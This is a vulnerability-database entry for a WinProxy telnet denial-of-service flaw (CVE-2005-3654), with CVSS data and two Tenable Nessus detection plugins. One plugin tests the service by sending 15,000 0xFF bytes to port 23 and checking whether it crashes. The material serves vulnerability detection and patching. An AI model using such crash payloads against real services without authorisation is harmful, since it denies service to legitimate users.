Vulnerabilities > CVE-2005-3654 - Remote Denial Of Service vulnerability in Blue Coat Systems WinProxy Telnet
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Blue Coat Systems Inc. WinProxy before 6.1a allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large number of packets with 0xFF characters to the Telnet port (TCP 23), which corrupts the heap.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 19 |
Nessus
NASL family Firewalls NASL id WINPROXY_61A.NASL description The remote host is running WinProxy, a proxy server for Windows. According to the Windows registry, the installed version of WinProxy suffers from denial of service and buffer overflow vulnerabilities in its telnet and web proxy servers. An attacker may be able to exploit these issues to crash the proxy or even execute arbitrary code on the affected host. last seen 2020-06-01 modified 2020-06-02 plugin id 20393 published 2006-01-10 reporter This script is Copyright (C) 2006-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/20393 title WinProxy < 6.1a Multiple Vulnerabilities (credentialed check) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(20393); script_version("1.14"); script_cve_id("CVE-2005-3187", "CVE-2005-3654", "CVE-2005-4085"); script_bugtraq_id(16147, 16148, 16149); script_name(english:"WinProxy < 6.1a Multiple Vulnerabilities (credentialed check)"); script_summary(english:"Checks for multiple vulnerabilities in WinProxy < 6.1a"); script_set_attribute(attribute:"synopsis", value: "The remote proxy is affected by multiple vulnerabilities." ); script_set_attribute(attribute:"description", value: "The remote host is running WinProxy, a proxy server for Windows. According to the Windows registry, the installed version of WinProxy suffers from denial of service and buffer overflow vulnerabilities in its telnet and web proxy servers. An attacker may be able to exploit these issues to crash the proxy or even execute arbitrary code on the affected host." ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?40f07cd6" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?3a6c81a5" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?79b3006b" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8c88612f" ); script_set_attribute(attribute:"solution", value: "Upgrade to WinProxy version 6.1a or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Blue Coat WinProxy Host Header Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10"); script_set_attribute(attribute:"patch_publication_date", value: "2006/01/05"); script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/05"); script_cvs_date("Date: 2018/08/06 14:03:14"); script_set_attribute(attribute:"plugin_type", value:"local"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Firewalls"); script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc."); script_dependencies("smb_hotfixes.nasl"); script_require_keys("SMB/Registry/Enumerated"); script_require_ports(139, 445); exit(0); } if (!get_kb_item("SMB/Registry/Enumerated")) exit(0); # Look in the registry for evidence of WinProxy. name = get_kb_item("SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/WinProxy 6/DisplayName"); if (name && name =~ "^WinProxy \(Version ([0-5]\.|6\.0)") { security_hole(0); exit(0); }NASL family Windows NASL id WINPROXY_TELNET_61A.NASL description The remote host is running WinProxy, a proxy server for Windows. The installed version of WinProxy last seen 2020-06-01 modified 2020-06-02 plugin id 20392 published 2006-01-10 reporter This script is Copyright (C) 2006-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/20392 title WinProxy < 6.1a Telnet Proxy Remote DoS code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(20392); script_version("1.17"); script_cve_id("CVE-2005-3654"); script_bugtraq_id(16149); script_name(english:"WinProxy < 6.1a Telnet Proxy Remote DoS"); script_summary(english:"Checks for denial of service vulnerability in WinProxy < 6.1a Telnet Proxy"); script_set_attribute(attribute:"synopsis", value: "The remote telnet proxy server is affected by a denial of service vulnerability." ); script_set_attribute(attribute:"description", value: "The remote host is running WinProxy, a proxy server for Windows. The installed version of WinProxy's telnet proxy fails to handle a long string of 0xff characters. An attacker may be able to exploit this issue to crash the proxy, thereby denying service to valid users." ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b140c13e" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8c88612f" ); script_set_attribute(attribute:"solution", value: "Upgrade to WinProxy version 6.1a or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10"); script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/05"); script_cvs_date("Date: 2018/08/06 14:03:17"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc."); script_dependencies("find_service1.nasl"); script_require_ports("Services/telnet", 23); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("telnet_func.inc"); port = get_service(svc:"telnet", default: 23, exit_on_fail: 1); # Make sure the service looks like WinProxy. banner = get_telnet_banner(port:port); if ( banner && "Enter computer name to connect to." >< banner ) { # Flag it as a proxy. register_service(port:port, ipproto:"tcp", proto:"telnet_proxy"); # Try to exploit it. soc = open_sock_tcp(port); if (soc) { banner = recv(socket:soc, length:4096); send(socket:soc, data:crap(length:15000, data:raw_string(0xff))); res = recv(socket:soc, length:1024); close(soc); # Now try to reconnect. soc = open_sock_tcp(port); if (soc) { banner = recv(socket:soc, length:4096); send(socket:soc, data:SCRIPT_NAME); res2 = recv(socket:soc, length:1024); close(soc); } # There's a problem if we didn't get a response the second time. if (!strlen(res) && !strlen(res2)) { security_hole(port); exit(0); } } }
References
- http://secunia.com/advisories/18288
- http://securityreason.com/securityalert/322
- http://securitytracker.com/id?1015442
- http://www.idefense.com/intelligence/vulnerabilities/display.php?id=365
- http://www.securityfocus.com/bid/16149
- http://www.vupen.com/english/advisories/2006/0065
- http://www.winproxy.com/products/relnotes.asp